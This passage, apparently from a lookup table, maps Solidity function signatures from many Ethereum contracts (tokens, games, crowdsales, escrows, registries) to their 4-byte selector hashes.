"mock_getUInt(address,address)": "0x1e275d5f", "mock_getAddress(uint256)": "0xa3472270", "mock_length()": "0xc0c19d29", "getCounter()": "0x8ada066e", "bumpCounter(uint256)": "0x20ef57ed", "setDelegate(address)": "0xca5eb5e1", "MainContract()": "0xb516cf2e", "transferTo(address,uint256)": "0x2ccb1b30", "useSuperPowers()": "0x43634c39", "MultipleErrorsContract()": "0x9f5c671e", "getEmailAddressOwner(string)": "0xf5a91ef7", "verifyEmailAddress(address,string)": "0xbc82f4d3", "removeEmailAddress(string)": "0x1f38034c", "registerEmailAddress(address,string)": "0xc5933658", "IdentityRegistry()": "0x63b0a5c3", "getOffer(bytes32,address)": "0x5218bfbb", "getRecordOffers(bytes32)": "0x3478dc44", "getFullRecord(bytes32)": "0xfb31ff37", "transfer(uint32,address,uint224)": "0x2125b65b", "owner(string)": "0xdf55b41a", "adopt(address)": "0x616fca9b", "name(address)": "0x01984892", "Latch()": "0x2d077ad0", "addr(string)": "0x511b1df9", "unlinkEID(bytes,bytes,address)": "0x2a095fbe", "payWinner()": "0xbe71248a", "linkEID(bytes,bytes)": "0xb4787dc5", "abs(int8)": "0x0b7623ba", "whatWasTheVal()": "0x264c8e9a", "isValid(bytes,bytes)": "0xa87e7552", "betOn(int8)": "0xfc687311", "IndexOf()": "0x71dd8862", "bytes32_to_bytes(bytes,bytes,bytes)": "0x4664b235", "WeatherBet(uint256,address,address,address)": "0x17ff0caa", "getCrtDetails(bytes)": "0x9209b3c0", "get(uint256)": "0x9507d39a", "copyBytes(bytes,uint256,uint256,bytes,uint256)": "0x84734476", "set(int8)": "0xfaee13b9", "TemperatureOracle()": "0x8ac4e1d8", "rsaVerify(bytes,bytes,uint256,bytes)": "0xfd747c0b", "setCRLaddr(address)": "0x114d69b2", "_myGroupHelper()": "0x5bbfe9b6", "setCAmodulus(bytes)": "0x100c8ada", "_myAddressHelper()": "0x6a4a6b6e", "POI()": "0x2feda2fa", "_incBlock()": "0x8cfd8901", "sum()": "0x853255cc", "isRevocated(bytes)": "0x3e2729bf", "verify(bytes,uint8,bytes,bytes)": "0x27121069", "insert(uint256)": "0x90b5561d", "commit()": "0x3c7a3aff", "sendHalf(address)": "0x75949c13", "testBroken()": "0x9928811b", "poi()": "0x3807ba1b", "getData(uint256)": "0x0178fe3f", "numGroups()": "0x83324e8c", "setData(uint256,uint256)": "0x4848b1a5", "blockNumber()": "0x57e871e7", "g(uint256)": "0xe420264a", "getOffer(uint256)": "0x4579268a", "f(uint256,uint256)": "0x13d1aa2e", "cancel(uint256)": "0x40e58ee5", "Derived(uint256)": "0x20bf0c52", "buyPartial(uint256,uint256)": "0xa5d0bab1", "Base(uint256)": "0x29161820", "buy(uint256)": "0xd96a094a", "getChoice()": "0x67cb61b6", "trade(address,uint256,bytes,address,uint256,bytes)": "0xb742398b", "getContractBalance()": "0x6f9fb98a", "c()": "0xc3da42b8", "offer(uint256,bytes,uint256,bytes)": "0x26066ad5", "getContractAddress()": "0x32a2c5d0", "next_id()": "0xe31bfa00", "getTxOrigin()": "0xb8077e28", "getTxGasprice()": "0x77e5bf84", "getMsgGas()": "0x9d5c6061", "getIteration()": "0xfc2c3e08", "getMsgValue()": "0xa17042cc", "computeNameHashExt(bytes)": "0x7fd8ee68", "Incrementer()": "0x635cfda2", "getMsgSender()": "0x7a6ce2e1", "validateNameExt(bytes)": "0x4d536f9f", "getMsgData()": "0xc8e7ca2e", "roundMoneyDown3SFExt(uint256)": "0x4b5dc8cb", "getPlayerGainLossOnLastFlip()": "0x0efafd01", "getBlockTimestamp()": "0x796b89b9", "sendWithAllOurGasExceptExt(address,uint256,uint256)": "0x5294157f", "getResultOfLastFlip()": "0xcee6f93c", "getCurrentBlockNumber()": "0x6fd902e1", "sendWithExtraGasExt(address,uint256,uint256)": "0xee6d2641", "getLastBlockHashUsed()": "0x94c3fa2e", "getCurrentGaslimit()": "0x92b7d5b9", "getLastBlockNumberUsed()": "0x34dbe44d", "setThroneCreationPrice(uint256)": "0x58ea80e5", "getCurrentDifficulty()": "0xa1188e56", "betAndFlip()": "0x25d8dcf2", "registerThrone(bytes,uint256,address,uint256,uint256)": "0x2f4ee5d4", "sha(uint128)": "0xf9e05ed9", "getCurrentMinerAddress()": "0xf8f46b5f", "registerExistingThrone(bytes,address,uint256,uint256)": "0x4ca8b0d0", "getEndowmentBalance()": "0x5acce36b", "findThroneByNameHash(uint256)": "0xf4e36afd", "basicInfoGetter()": "0xb3a0b1ef", "CoinFlipper()": "0xd8589be3", "findThroneCalled(bytes)": "0x044f9ac8", "createThrone(bytes,uint256,uint256,uint256,uint256)": "0x5581004d", "getTileDescription(uint8,uint8)": "0x16870257", "validateProposedThroneConfig(uint256,uint256,uint256,uint256)": "0x01df7f30", "getPongvalTxRetrievalAttempted()": "0xa396541e", "StringPasser(uint8[])": "0x694e0d5b", "validateProposedThroneName(bytes)": "0x931df75f", "setPongval(int8)": "0x23a1c271", "getDescription()": "0x1a092541", "numberOfThrones()": "0x273bc3c9", "Pong(int8)": "0xf2080ba6", "ThroneMaker(uint256)": "0x6d1f00a6", "validateProposedMonarchName(bytes)": "0xc1c723f4", "getSecond()": "0x1b03316f", "test_newProposalAndNotEnoughVotes()": "0x7701f361", "test_SixtyPercentRules()": "0x4a2fed3d", "MainExchangeNM()": "0x163ebd3a", "finalizeContract()": "0x28c5cf0a", "test_36_assertGasUsage2000Boards()": "0xeb7a10b1", "test_35_assertGasUsage1400Boards()": "0xf5fda5da", "test_34_assertGasUsage700Boards()": "0x13d65cd9", "test_33_assertGasUsage200Boards()": "0x14670850", "test_32_assertGasUsage100Boards()": "0x7ccd099d", "test_31_assertGasUsage50Boards()": "0x50192ae6", "test_26_assertGasUsage2000Boards()": "0x0aa2bf7f", "test_25_assertGasUsage1400Boards()": "0xab8a1595", "test_24_assertGasUsage700Boards()": "0x70ac970b", "test_23_assertGasUsage200Boards()": "0xd8d8e2f2", "test_22_assertGasUsage100Boards()": "0xb5320cd6", "test_21_assertGasUsage50Boards()": "0xc69034ab", "test_6_assertGasUsage2000Boards()": "0x78aa34bf", "test_5_assertGasUsage1400Boards()": "0x86ecce90", "test_4_assertGasUsage700Boards()": "0x52dc09a5", "test_3_assertGasUsage200Boards()": "0x5c91fa67", "test_2_assertGasUsage100Boards()": "0x202feb77", "test_1_assertGasUsage50Boards()": "0xf6c976d2", "deployBoard()": "0xe8d03e91", "createOrder(uint32,uint32,uint256,bool)": "0xe59ff828", "GxOrders(address)": "0x9306099f", "mix()": "0xbe32cf8d", "lockedEthBalanceOf(address)": "0x59716eed", "ethBalanceOf(address)": "0x7252bbf2", "unlockEthBalance(address,uint256)": "0x7ea23fa6", "lockEthBalance(address,uint256)": "0x1fdcf5a7", "chargeFee(address)": "0xa66df701", "chargeFeeAndLockEthBalance(address,uint256)": "0x70cfab63", "withdrawEth(uint256)": "0xc311d049", "depositEth()": "0x439370b1", "EthbetOraclize(address,address,uint256)": "0xbb502bac", "TokenCAP()": "0x1be20ca1", "consumeTicket(address,string,uint256)": "0xe47da59e", "getTicketCount(address,string)": "0x59276653", "transfer(address,string,uint256)": "0xfff3a01b", "TicketMultiTear(string,string[],uint256[])": "0x4b396ade", "getDebtById(uint256)": "0xc0c83c0d", "getOrderById(uint256)": "0x42b50a7a", "getDebtLength()": "0x8f61da35", "getOrderLength()": "0x9d4971b7", "confirmDebt(uint256)": "0xaa9e40e0", "createDebt(uint256,address,uint256)": "0xe89f5329", "createOrder(string,address)": "0x9453f767", "DebtManager()": "0xb981655f", "proofOfWork(uint256)": "0x5c10fe08", "sendBread(address,uint256)": "0x6e403cd7", "initializeBread(uint256,string)": "0xa192274d", "checkTransferAllowed(address,address)": "0x4bb6e766", "getTokenAddresses()": "0xee8c24b8", "getTokenBySymbol(string)": "0xefa74f1f", "getTokenByName(string)": "0xe73fc0c3", "getTokenMetaData(address)": "0x7abccac9", "getTokenAddressByName(string)": "0x2fbfeba9", "getTokenAddressBySymbol(string)": "0x3550b6d9", "setTokenUrl(address,string)": "0x91914b30", "setTokenSwarmHash(address,bytes32)": "0xeaabd05e", "setTokenIpfsHash(address,bytes32)": "0x34ed557f", "setTokenSymbol(address,string)": "0xf036417f", "setTokenName(address,string)": "0xc370c86d", "removeToken(address)": "0x5fa7b584", "addToken(address,string,string,string,uint8,bytes32,bytes32)": "0x9a84d0c4", "sendEmail(address,string,bytes32,string)": "0x536c2e4a", "registerUser(bytes32,string)": "0x4a54315c", "testDebugClock()": "0xfd38af55", "testNowClock()": "0x435a0803", "test_callIt()": "0xcb388b9b", "_Test_Oraclize()": "0x3c842a26", "addChallenge(address)": "0xf8242c32", "getChallenges()": "0x46c7c126", "funcFromC3()": "0x9db67cd0", "validation(uint256)": "0xb72bedd0", "cancelOrders()": "0x460c1a7a", "getTopLevel(uint256,uint256)": "0x8e63d7e1", "orderMatchSell(uint256,uint256,uint256,uint256,uint256)": "0x10c5b269", "orderMatchBuy(uint256,uint256,uint256,uint256,uint256)": "0xa45e11ab", "placeSellOrder(uint256,uint256,uint256,uint256)": "0x72e18c12", "placeBuyOrder(uint256,uint256,uint256,uint256)": "0xeddb00d4", "addOptionChain(uint256,uint256,string,uint256,uint256,bytes32,address,int256[])": "0xee5f013e", "getMarketTopLevels()": "0xe54aae13", "getIdxBatchByUsername(bytes20[])": "0x84297029", "check(bytes20,uint32,int24[4],int24[4],uint32[4],bytes32[])": "0x741f0434", "register(bytes20,uint32,int24[4],int24[4],uint32[4],bytes32[])": "0xc42c9905", "RedditRegistry(bytes32,uint8,uint16)": "0x0632f718", "setPaused(bool)": "0x16c38b3c", "Crowdfunding(address,address,string,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xa82d4ac1", "bountyValue(uint256,uint256)": "0x890814f8", "deductCoin(address,uint256)": "0x4a25b2fd", "defaultWallet(address)": "0x8f4a2a51", "RVRCoin()": "0x29079291", "raiseLimit()": "0xaa8a0002", "randomTargetAssign()": "0xd96bcd8f", "randomAttack()": "0xfe1798a7", "retaliate()": "0x6dd0d091", "attack(address)": "0xd018db3e", "getPlayerStats()": "0x847a5e99", "claimCooldowns()": "0x5143659d", "setLLV_edit_13(string)": "0xbd527527", "getLLV_edit_12()": "0x78caa728", "setLLV_edit_12(string)": "0x7f592cfe", "getLLV_edit_11()": "0x8e0adbf5", "setLLV_edit_11(string)": "0x94f2e623", "getLLV_edit_10()": "0xe9e43eef", "setLLV_edit_10(string)": "0x86b88af0", "getLLV_edit_9()": "0x53729273", "setLLV_edit_9(string)": "0x0c21e754", "getLLV_edit_8()": "0xf72db5a3", "setLLV_edit_8(string)": "0x8d7cdcf4", "getLLV_edit_7()": "0x41080cfa", "setLLV_edit_7(string)": "0x0e03f276", "getLLV_edit_6()": "0xde942e62", "setLLV_edit_6(string)": "0x6491f0b7", "getLLV_edit_5()": "0xfd63f640", "setLLV_edit_5(string)": "0x3a6128db", "getLLV_edit_4()": "0xf337a0bb", "setLLV_edit_4(string)": "0xb87ee9d6", "getLLV_edit_3()": "0xfdf58814", "setLLV_edit_3(string)": "0x87541c9e", "getLLV_edit_2()": "0xcd482d9f", "setLLV_edit_2(string)": "0x0f15573b", "getLLV_edit_1()": "0x12c77207", "setLLV_edit_1(string)": "0x990fa439", "LLV_311_EDIT_4()": "0xe51fcfa2", "MultiHolderVault(address,uint256)": "0x5ea36bd6", "initHolders(address[],uint96[])": "0xec5dfaa2", "getHolderCount()": "0x7136982b", "HolderBase(uint256)": "0x6a3f3b97", "write(bytes)": "0x7ed0c3b2", "setCache(address)": "0x948f5076", "execute(bytes,bytes)": "0x1f6a1eb9", "GangnamToken()": "0x1408073e", "transferOwnership()": "0x880ad0af", "getmortiesSinceLastHatch(address)": "0xbd079484", "getMymorties()": "0x069cff34", "getRnMmasterReq()": "0x9a06c2d3", "getMyRickAndMorty()": "0xfcc830be", "getFreeRickAndMorty()": "0x52f9058b", "calculatemortiesell(uint256)": "0x1aad8b82", "buyMorties()": "0x9f807962", "sellMorties()": "0xd4589835", "hatchMorties(address)": "0x5c7f3d9a", "becomePickleRick()": "0x200cdf8e", "RickAndMortyShrimper()": "0xeaa47de2", "iPayStar()": "0x531c9a56", "showLastGlobalAuditTime()": "0xeb7ea41b", "showAssetEvent(bytes32,uint256)": "0xb7ba0ba0", "countAssetEvents(bytes32)": "0x18ba4218", "showSupply()": "0x55265669", "countAssets(uint256)": "0x6ae85216", "showAssetDetails(bytes32)": "0xb340f2b4", "showAssetInfo(bytes32)": "0x49a6a4de", "listUserRecastsFrom(address,bytes32,uint256,bool)": "0xda8a46e0", "listUserRecasts(address,uint256,bool)": "0xa06ac637", "listAssetDocumentsFrom(bytes32,bytes32,uint256,bool)": "0x99c2bb40", "listAssetDocuments(bytes32,uint256,bool)": "0xaa72f725", "listGlobalAuditDocumentsFrom(bytes32,uint256,bool)": "0xe4f02750", "listGlobalAuditDocuments(uint256,bool)": "0x0c700183", "listAssetsFrom(uint256,bytes32,uint256,bool)": "0xe13251b9", "listAssets(uint256,uint256,bool)": "0x39298f4a", "assets_explorer_controller()": "0xf4afbdca", "marketplace_storage()": "0xcef2e559", "gold_token_storage()": "0x8c2779f5", "assets_controller()": "0xd487b21a", "AssetsExplorer(address)": "0xb2a7d1b7", "get_last_global_audit_time()": "0x39681333", "get_asset_event_details(bytes32,uint256)": "0x7130d7ce", "get_asset_events_count(bytes32)": "0x40543538", "get_total_items_in_state(bytes32)": "0x14ac1102", "get_asset_details(bytes32)": "0x53b15f31", "get_asset_info(bytes32)": "0x2d019a71", "get_previous_user_recast_from_item(bytes32,bytes32)": "0x830adf56", "get_next_user_recast_from_item(bytes32,bytes32)": "0x06af3c75", "get_last_user_recast(bytes32)": "0xaf225fd6", "get_first_user_recast(bytes32)": "0x293f5e6a", "get_previous_asset_document_from_document(bytes32,bytes32)": "0x9eb45706", "get_next_asset_document_from_document(bytes32,bytes32)": "0x264a6d10", "get_last_asset_document(bytes32)": "0x4bd67ced", "get_first_asset_document(bytes32)": "0x9ad900d6", "get_previous_global_audit_document(bytes32)": "0x57595e2a", "get_next_global_audit_document(bytes32)": "0xbc15e5fe", "get_last_global_audit_document()": "0x3751e6bc", "get_first_global_audit_document()": "0x935b1624", "get_previous_item_in_state_from_item(bytes32,bytes32)": "0xc15f8779", "get_next_item_in_state_from_item(bytes32,bytes32)": "0x329cd958", "get_last_item_in_state(bytes32)": "0xad22d4a2", "get_first_item_in_state(bytes32)": "0x83dbff4b", "read_supply()": "0x0d8c1c17", "is_locked()": "0xa63c500f", "init(bytes32,address)": "0x2aa71e24", "get_contract(bytes32)": "0x3f83acff", "unregister_contract(bytes32)": "0xc8b56bda", "init_register_contract(bytes32,address,address)": "0x0da2ee2f", "verifySignature(bytes32,uint8,bytes32,bytes32)": "0x96957869", "encodePriceFeed(uint256,uint256,uint256,uint256)": "0xb340d8cf", "decodePriceFeed(uint256)": "0x5b4078de", "setSellFeeBps(uint256)": "0x34119d15", "setBuyFeeBps(uint256)": "0x9058c8a4", "setFundraiserAddress(address)": "0x1e4d17c5", "DoNotBloodyDeployThisGetTheRightOne()": "0x5e00bd96", "SupercarToken()": "0x50eb7ec4", "setGamblingFee(uint256,uint256)": "0xa1888c34", "createContractTokenWithPrice(string,uint256)": "0x070ae23b", "createContractToken(string)": "0xe160e146", "createPromoToken(address,string,uint256)": "0x0acf4b0b", "getTokenInfo(uint256)": "0x8c7a63ae", "setTokensContract(address)": "0x68a52851", "SportStarMaster()": "0x239da1a3", "_createToken(string,address)": "0xa4a92dd0", "setTokenData(uint256,bytes32)": "0xb00dba63", "updateOwner(address,address,uint256)": "0xc391c1b5", "createToken(string,address)": "0xa2119377", "getTokenData(uint256)": "0xb09afec1", "SportStarToken()": "0xbe7aa7be", "manualyAddReferralPayer(address,address,uint256)": "0x13f73570", "manualyAddReferral(address,uint256)": "0xdef59575", "BOT_ELEMENT_4()": "0x3b5c020d", "Daz()": "0x89ee8758", "TrumpCoins()": "0x40f54c08", "hackoin(string,string)": "0x19cddd4b", "transferAdeptTokenOwnership(address)": "0x109538ca", "transferEducatedTokenOwnership(address)": "0x6d064875", "transferTenuousTokenOwnership(address)": "0xef984923", "transferHackoinTokenOwnership(address)": "0x6ba8d421", "whiteHat()": "0xc70a3f1a", "hackAdept(address)": "0x060ba7e9", "hackEducated(address)": "0xdfa8be5f", "hackTenuous(address)": "0x8fe5f77d", "hack(address)": "0x6c4c174f", "whitehatRecover()": "0xbe45d47e", "hackDecisive(address,uint256)": "0x2ff9b03a", "adjustTiming(uint256,uint256)": "0x629cefee", "initialise()": "0x592e6f59", "SKPT()": "0xcae6ff18", "QtumToken()": "0x38f4cc7a", "DLK()": "0xe66bf416", "SEN()": "0x726d82a0", "MiniMeToken(address,uint256,string,uint8,string)": "0x444316e8", "proxyMintTokens(address,uint256,bytes32)": "0x699dc8ff", "switchRecycleAllowed(bool)": "0x3b3c0717", "summon10SkinAppearance(uint256,uint128)": "0xc383b1bb", "recycleAppearance(uint128[5],uint256,uint128)": "0x1ed358e6", "randomSkinAppearance(uint256,uint128)": "0x8ef87843", "calcNewSkinAppearance(uint128,uint128,uint128)": "0x0f7f97c8", "changeMixEnable(bool)": "0x25ddda76", "setActiveSkin(uint256)": "0x8c944339", "_isComplete(uint256)": "0x87ccd8b3", "acceptCoinSale()": "0xfdbd2534", "startCoinSale(uint256,address)": "0x4e696d3c", "mintCoins(address,uint256)": "0xb7fde9da", "YouCollectCoins()": "0xd89ab6d3", "Stakefasttoken()": "0x07c599df", "DURIANFX()": "0x07dcfebe", "ACN()": "0x95c02700", "TTCoin()": "0x876777d0", "EtherGang()": "0x6f02483f", "Power2X()": "0x0036242d", "AESSignatum(uint256,string,string)": "0xf4773d26", "getGpgKey()": "0x6b2cd752", "getSellerSignature(string)": "0x7ac59d43", "getBuyerSignature(string)": "0xca6c7400", "getDawexSignature(string)": "0x2bd97c6d", "addGpgKey(string)": "0x78b0cb23", "addSellerSig(string,string)": "0xb159d61b", "addBuyerSig(string,string)": "0x09f14a20", "createContract(string,string)": "0x631a4231", "SignedContractVault(string)": "0xbfdad9a4", "ORIUMCOIN()": "0x1c558b71", "myCoinAge()": "0xd16b04cf", "changeadmin(address)": "0x26ea7ab8", "selltoken(uint256)": "0x93316cdf", "updatetoken(uint256,string,string,string,string,string,uint256,bool)": "0x2d826eda", "createtoken(string,string,string,string,string,uint256)": "0x2a7e0cc0", "CryptoConseilSuisse()": "0x65449436", "FRO()": "0x6cdf7cdf", "adaCoin()": "0x24a4aff6", "appealSkip()": "0x5937e534", "skip()": "0x1d2aa5b3", "HDT()": "0x56b1ddbb", "EmpireCrowdsale(uint256,uint256,address,uint256,uint256,uint256)": "0x763b144e", "FundAccount()": "0x3eb10ab3", "userTakeOrder(address,address,uint256,uint256,address)": "0x26f4b3de", "agentMakeOrder(address,address,uint256,uint256,address)": "0x26a52019", "ModernTokenPlus()": "0x7ce1b194", "mint(address,uint128)": "0xbe29184f", "OPC(string,string,address)": "0x044f53ee", "UNITDummyPaymentGateway(address)": "0xc24d316e", "MusiconomiToken()": "0x6a0323b2", "checkCandy(address)": "0x65050e27", "sendCandy(address)": "0xa46b6593", "monechainToken()": "0xab34dc48", "lastgamewinner()": "0x26c81320", "getwinnerloser()": "0x2f1017cb", "lastrandom()": "0x1d184872", "len(address)": "0xc6cce2e7", "getaddr(address,uint8)": "0xb340a972", "getTotalBet()": "0xbfe38df5", "getCountryOwnershipList()": "0x8ae69caa", "SaloniToken()": "0xe993c056", "updateWhitelistMapping(address[],address,bool)": "0x43dd8b30", "setWhiteListingAdmin(address)": "0x79d116ed", "runPreMint()": "0x72a4a02f", "sendPresaleTokens(address,uint256)": "0xf94f04e4", "transferFinal()": "0x580215fc", "changeBonus(uint256,uint256)": "0x6caed305", "InitChallengeAddress(address[10],address,uint256[10])": "0xefde9d6e", "GluuTokenCrowdSale(uint256,uint256,uint256,uint256,uint256,uint256,address,address,uint256,address,address,address)": "0x3aebe2a3", "RefundableCrowdsaleWithCommission(uint256,address)": "0x12bb9d3e", "RefundVaultWithCommission(address,address)": "0x63d8c5b7", "updatePresaleListMapping(address[],address,bool)": "0xf1d1768c", "startPresaleTrading()": "0x21aa1706", "validPresaleTrading()": "0xb0005ff1", "verifyTx(uint256[2],uint256[2],uint256[2][2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[1])": "0xb908b008", "processRewards()": "0xf9fc0d07", "lock(string,string)": "0x4406face", "ixentest()": "0x8aa81eac", "LocalLambosEscrows()": "0x9c2e29c6", "removeDealInternal(bytes16)": "0xbaf79eb4", "getDeal(bytes16)": "0xc0c47e12", "getSumAmountOfOpenDeals()": "0xa0c354ea", "getSumAmountOfDisputedDealsProPatient()": "0x5b2298c8", "getSumAmountOfDisputedDealsProDoctor()": "0x18fdcaba", "getSumAmountOfSuccessfulDeals()": "0xfb60938f", "getNumberOfDisputedDealsProPatient()": "0x2bdb33c3", "getNumberOfDisputedDealsProDoctor()": "0x7c77b7c4", "getNumberOfOpenDeals()": "0xa9a40c71", "getNumberOfSuccessfulDeals()": "0xd90a8224", "removeDeal(bytes16)": "0xeacbe9ca", "resolveDispute(bytes16,bool)": "0x50515d5a", "confirmDealCompletionByPatient(bytes16,bool)": "0x7a4058dd", "confirmDealCompletionByDoctor(bytes16,bool)": "0xad09202a", "confirmDeal(bytes16)": "0xbfb8c63e", "acceptDeal(bytes16)": "0xf25acb35", "placeDeal(bytes16,address,address,uint256)": "0x822942aa", "withdrawFee(address)": "0x1ac3ddeb", "removeArbitrator(address)": "0x973ad270", "newcheckToken()": "0xb63f0d20", "Medis()": "0x4bc57a7c", "edit(uint256,address,uint256,string,string,string,string,uint256,address,uint256,string,string,string,string)": "0x97e8b490", "editDuration(uint256)": "0x304318d3", "editBalanceOf(address,uint256)": "0x55af5c59", "testing(uint256)": "0x6c30f765", "getDeveloper()": "0x7a444072", "LightofGalaxy()": "0x213a72a7", "setDeveloper(string,uint256)": "0xbe4ea54d", "AJCMToken()": "0x4d8c10a6", "request_withdrawal(address,uint256)": "0x97afb40c", "bid(string,string,string,string)": "0x976898c7", "changeAREFWallet(address)": "0x08464b68", "MyERC20Token(string,string,uint256,uint256)": "0xca668eb2", "PaulSportsCoin()": "0x6db14a1c", "balanceAll(address[])": "0x63905232", "burn(address[])": "0x6c5d6156", "isTransferAllowed(address)": "0x8822048e", "KvantorToken()": "0x9957f3e6", "bulkSend(address[],uint256[])": "0xd27d3e88", "SangusToken()": "0x849e3dcd", "revokeAccess(bytes32,address)": "0x8d53b208", "grantAccess(bytes32,address,string)": "0x0e169119", "_addSig(bytes32,address)": "0xa0bb7508", "_addRecord(bytes32,address,string,string)": "0xe6c4a46a", "SSDToken()": "0xb592bb99", "sigExists(bytes32,address)": "0xa440dd87", "rootHashOf(bytes32)": "0x11c4e123", "recordOwnerOf(bytes32)": "0x36880b82", "recover(bytes32,bytes32,bytes32,uint8)": "0x388f2c39", "addSig(bytes32,bytes32,bytes32,uint8)": "0xd7c23578", "addSigByProvider(bytes32)": "0x2e10feff", "addRecordByProvider(bytes32,address,string,string)": "0xa433a0b9", "addRecord(bytes32,string,string)": "0xe27929b6", "addRecordByAdmin(bytes32,address,address,string,string)": "0x04a782ee", "provenanceOf(address)": "0xdbe3e92f", "setProvenance(address,uint256)": "0x6245eb07", "MadToken()": "0xec38027e", "transferBackTo(uint256,address)": "0xa37be00f", "isTokenAvailable(uint256)": "0x702cbbae", "calculateAndDecreasePhaseSupply(uint256)": "0x92369bd5", "TGIF(address)": "0xa740cf90", "giveBonus(address,uint256)": "0xb722875f", "setPaoContactAddress(address)": "0xe4e6de18", "transferFundWalletWallet(address)": "0x95bbbe45", "OHGLuangPrabang()": "0xf50ebd21", "mintDSBIToken(address,uint256)": "0x842acf9d", "setConsumeToken(address)": "0x10525660", "checkMyBalance()": "0xb37d61f8", "LIWUC()": "0x0b8f0e0a", "CleosContract()": "0x5ce2fea1", "CHARITYSEACOIN()": "0xe851808e", "Telegram()": "0xfdc9d0f4", "PreIco(uint256,address,uint256)": "0xacb6f75c", "MCCPP()": "0xbe743ccb", "HolyCoin()": "0x7513eaa7", "CanalToken()": "0x40117f50", "AOCTrader()": "0x668b1b7e", "AIN()": "0x9851b2bd", "emergencyWd()": "0xc922f446", "getRandomNumberList()": "0x60b82e2e", "FANCrowdsale(uint256,uint256,address,address)": "0x06e31056", "INTREPID_SHIP_LIMIT()": "0xf9a2cbd5", "teamAddressOne()": "0x7b06e907", "rateAirDrop()": "0xd7ba30b2", "jackpotrate()": "0x10a73f5e", "BUYER_CAP_HIGH_USD()": "0xa24c9737", "ADVISORS_TOKENS_PERCENT()": "0xd2fbbc51", "m_currentTokensSold()": "0x4ae4e9ea", "totalAllowedFreeze()": "0x682594db", "tier5()": "0x1e5ff41a", "gasForDCN()": "0xc72be838", "TOKEN_SUPPLY_PRESALE_LIMIT()": "0x9baeac78", "goalInEthers()": "0x942ac303", "becomeFriendsWithMe()": "0xe4a41c7f", "amountForBonus()": "0x99721229", "partner1_vows()": "0xea760df8", "TEAM_RESERVE_FTX()": "0xc8c72bb4", "startICOPhaseThree()": "0x0c65e229", "deployer()": "0xd5f39488", "totalDepositBalance()": "0xe8c0a0df", "delegateProxyImplementation()": "0x97204d8e", "the_nominal_annual_interest_rate()": "0x31462b96", "isUpdatable()": "0x0e1d2ec8", "MAX_MIDGRADE()": "0x45b6ccfd", "session()": "0x5e3568b8", "setReachCapped()": "0xcafe2f19", "advisoryPool()": "0x39dd134c", "configString()": "0x4d395384", "oneTokenInFiatWei()": "0x12ade015", "tokenIssuedAirDrop()": "0x84c99b6d", "VALIDITY()": "0x3f97d995", "oracleRegistryContract()": "0xde3f26eb", "TokenManager()": "0xc509c262", "issuerDecimals()": "0xf6f6edd4", "unofficialUserSignUpFee()": "0x8577ffc1", "ioxis()": "0xfd3d0dbf", "abortTime()": "0x696fcc7c", "MulTraToken()": "0xd9cba1a1", "totalAccessories()": "0xe7718594", "EthernetCashWebsite()": "0x4490efe3", "minInvest()": "0x63fd9e38", "endPreICOTimestamp()": "0xe5033268", "getMaxEther()": "0x4906da1e", "TOTAL_SHARE()": "0xbf41e16f", "bubbled()": "0xc4fc89e1", "sponsoredLeaderboardDataContract()": "0x71f5584f", "tokensAuctioned()": "0x678212d9", "initDepth()": "0x59c21fd8", "alfatokenteam()": "0xe71897cd", "AVAILABLE_BONUS3_SUPPLY()": "0x204b21d1", "addrSale()": "0x7b875aab", "ICOCents()": "0x99755bab", "PAYOUT_FRAC_TOP()": "0x41c0dc59", "bids_ignored_count()": "0xc6dc437b", "roundStart()": "0x40365852", "initiateDeposit()": "0x6e4264ce", "presaleEtherRaised()": "0x44b49958", "stopIcoAndBurn()": "0xd85b07e0", "dividendsAccount()": "0x4dc5c771", "symbolLocked()": "0xf9bcb4b1", "getApplicantsLength()": "0xad3704c5", "importersBanksDraftMaturityDate()": "0x46817362", "transferClose()": "0xaae3d025", "COIN_SUPPLY_TOTAL()": "0x62362cc2", "joinFee_()": "0xbbeb5923", "Wallet9()": "0x841237b7", "TokenPriceETH()": "0xcdda96cf", "currentBatch()": "0x76cd940e", "ownerTokensMinted()": "0x210bc472", "currentGameBalance()": "0x3813be76", "_batch1_icosaleStartTimestamp()": "0x31d1c995", "STAGE_FOUR_TIME_END()": "0x4caeebd0", "IDLE()": "0x5478786c", "getStartingPrice()": "0xcebd31bc", "feeMakeExporter()": "0x04efa227", "ecoSystemAddress()": "0xd1e400f4", "pausedTimestamp()": "0x911ef508", "jackPotBestHash()": "0x87338e98", "bitplusAddress()": "0x9e75a7c8", "mintCoolDown()": "0x02c76d45", "tokenAddFee()": "0xbde4e7c2", "priceForBasePart()": "0x21c4d650", "COIN_PER_ETHER()": "0x9b39caef", "CurrentPrice()": "0xff69e2bc", "EDU_PER_ETH_PRE_SALE()": "0x1f97ea5d", "tokenPriceIncremental()": "0xbece2ea1", "memberContract()": "0xc40cf4eb", "tokenPriceUsd()": "0x5249be25", "unpause_3()": "0xbd48fa0e", "tokensNeededToGetPayment()": "0x07134b8b", "kycConfirmer()": "0x12e43da5", "PAYOUT_DATE()": "0x875ac8f1", "totalPets()": "0x987eae8f", "registryContractAddress()": "0x6793d383", "IQT_DECIMALS()": "0xeb195635", "TOTAL_BONUS_SUPPLY_ETH()": "0xfc34b908", "exchangeRateForETH()": "0x9ef7a463", "rateSetter()": "0xf265d351", "remainderPurchaser()": "0x18b03ceb", "isEcoAllocated12()": "0xfdfecb0c", "TOKEN_SUPPLY_AIR()": "0xad796b5d", "left70(uint256)": "0xe03827d2", "right70(uint256)": "0x99a3f0e8", "left69(uint256)": "0xa18e2eb9", "right69(uint256)": "0x03bdecf5", "left68(uint256)": "0xf1e328f9", "right68(uint256)": "0x3eaf9923", "left67(uint256)": "0x13ce15a9", "right67(uint256)": "0x7376fc8d", "left66(uint256)": "0x6f63d2ec", "right66(uint256)": "0x621a25f8", "left65(uint256)": "0x9c15be0b", "right65(uint256)": "0x4cc885d4", "left64(uint256)": "0xabc93aee", "right64(uint256)": "0xa8c4c8bc", "left63(uint256)": "0xe2172000", "right63(uint256)": "0x29816998", "left62(uint256)": "0x2cbf1f0d", "right62(uint256)": "0x96f68782", "left61(uint256)": "0xab81e773", "right61(uint256)": "0x4bc24ec5", "left60(uint256)": "0xcf69318a", "right60(uint256)": "0x8ce113dc", "left59(uint256)": "0xc9acab84", "right59(uint256)": "0xa6dacdd7", "left58(uint256)": "0xcad80024", "right58(uint256)": "0xcdadb0fa", "left57(uint256)": "0x3a95a332", "right57(uint256)": "0xdc12a805", "left56(uint256)": "0x1cf74ece", "right56(uint256)": "0x1bd6f596", "left55(uint256)": 